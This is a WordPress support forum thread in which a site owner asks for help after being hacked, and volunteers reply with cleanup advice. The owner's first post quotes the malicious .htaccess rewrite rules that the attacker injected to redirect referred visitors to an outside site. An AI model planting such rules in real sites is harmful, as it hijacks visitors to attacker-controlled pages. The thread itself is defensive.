WordPress.org

Ready to get started?Download WordPress

Forums

My website has been hacked twice in 2 days (9 posts)

  1. physty
    Member
    Posted 1 year ago #

    My htacess file at the root has been modified with the following code
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
    RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
    RewriteRule ^.*$ http://link-removed?h=1878600 [L,R]

    Also wp-login php file has been modified
    Can anyone help me? i have cleaned the issue once but it has come back

  2. @mercime
    Volunteer Moderator
    Posted 1 year ago #

  3. physty
    Member
    Posted 1 year ago #

    thanks guys,
    i am hosted at OVH.
    I will look at the links and plugin

  4. @mercime
    Volunteer Moderator
    Posted 1 year ago #

    @physty please do not download pirated plugins/themes from such sites as those could be compromised already i.e., virus etc.

  5. TrueFalse
    Member
    Posted 1 year ago #

    1. Find web-shell. Check the logs to the server.
    2. Check your website for vulnerabilities to exploit.
    3. Change all passwords.
    4. Change the access rights to files and directories on a read-only. (although this can bring you some inconvenience.)
    5. Remove all the consequences of hacking.

  6. physty
    Member
    Posted 1 year ago #

    How do i check the first item please?

  7. @mercime
    Volunteer Moderator
    Posted 1 year ago #

    Have you gone through the list I gave you? e.g. http://sitecheck.sucuri.net/scanner/

    Have you contacted tech support about your issue for assistance?

  8. physty
    Member
    Posted 1 year ago #

    YEs i have. It did not find anything.
    I have contacted OVH and am still waiting for their reply. I must say that in the meantime my problem has been fixed and has not reoccured. I have installed Better WP Security plugin. The plugin has detected a list of 404 errors found. Is that a problem?

  9. @mercime
    Volunteer Moderator
    Posted 1 year ago #

    The plugin has detected a list of 404 errors found. Is that a problem?

    It's a problem if the 404 errors are within your installation. Delete that old .htaccess file then go to Settings > Permalnks and choose setting other than default and Save. Check new .htaccess file and see if content is per http://codex.wordpress.org/Using_Permalinks#Creating_and_editing_.28.htaccess.29

    If the 404 errors are links to external sites, then identify the links and change/delete such links.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.